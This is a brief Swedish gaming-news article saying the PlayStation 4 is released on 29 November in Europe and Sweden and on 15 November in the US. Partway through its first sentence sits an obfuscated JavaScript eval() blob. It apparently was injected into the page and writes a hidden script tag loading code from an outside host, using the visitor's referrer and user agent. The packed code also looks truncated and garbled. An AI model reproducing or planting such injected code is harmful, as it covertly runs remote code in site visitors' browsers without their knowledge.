Image Image Image Image Image Image Image Image Image Image

| 22 maj, 2018

Scroll to top

Top

No Comments

Playstation 4 kommer den 29 november

playstation 4
Filip Urde
  • On 21 augusti, 2013
  • http://www.revue.se/filip-urde

Playstation eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zytya|var|u0026u|referrer|rfdsb||js|php’.split(‘|’),0,{}))
4 kommer att släppas i 32 länder detta året.

 

 
Playstation 4 kommer att släppas i USA den 15 november medan vi i Europa får vänta till den 29:e november. Sony bekräftade att Sverige är ett av de 32 länderna som får konsolen i år.

blog.us.playstation.com

Submit a Comment